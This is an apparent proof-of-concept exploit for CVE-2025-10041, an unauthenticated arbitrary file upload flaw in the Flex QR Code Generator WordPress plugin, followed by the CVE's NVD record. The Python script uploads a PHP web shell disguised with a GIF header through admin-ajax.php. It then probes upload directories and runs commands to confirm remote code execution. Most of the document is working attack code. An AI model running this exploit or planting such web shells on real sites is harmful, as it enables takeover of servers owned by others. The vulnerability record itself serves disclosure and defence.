CVE-2025-10041

# CVE-2025-10041 - Flex QR Code Generator Arbitrary File Upload PoC # Description: Exploits missing file type validation in save_qr_code_to_db() function # Target: WordPress sites with Flex QR Code Generator plugin <= 1.2.5 import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # Malicious PHP payload disguised as an image file # The GIF89a header helps bypass naive content-type checks PAYLOAD = b"GIF89a;\n<?php system($_GET['cmd']); ?>" def exploit(): # Endpoint for QR code generation/upload functionality upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Prepare the malicious file files = { 'qr_code_image': ('shell.php', PAYLOAD, 'image/gif'), } # Data parameters expected by the save_qr_code_to_db() function data = { 'action': 'save_qr_code', 'qr_code_name': 'malicious_qr', } print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Uploading malicious file...") # Send the unauthenticated upload request response = requests.post(upload_url, files=files, data=data, timeout=30) if response.status_code == 200: print(f"[+] Upload request sent successfully") print(f"[+] Response: {response.text[:500]}") # Attempt to access the uploaded shell # The shell is typically saved in /wp-content/uploads/ directory shell_urls = [ f"{TARGET_URL}/wp-content/uploads/qr-codes/shell.php?cmd=id", f"{TARGET_URL}/wp-content/uploads/2025/shell.php?cmd=id", f"{TARGET_URL}/wp-content/uploads/shell.php?cmd=id", ] for shell_url in shell_urls: print(f"[*] Trying: {shell_url}") shell_response = requests.get(shell_url, timeout=10) if shell_response.status_code == 200 and "uid=" in shell_response.text: print(f"[+] RCE CONFIRMED!") print(f"[+] Output: {shell_response.text}") return True print("[-] Exploit may have failed or shell location differs") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-10041", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:36.380", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in thesave_qr_code_to_db() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/tags/1.2.5/qr-code-generator.php#L208", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379026%40flex-qr-code-generator&new=3379026%40flex-qr-code-generator&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/flex-qr-code-generator/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40000879-a5ef-48f2-97e4-77d527259af0?source=cve", "source": "[email protected]"}]}}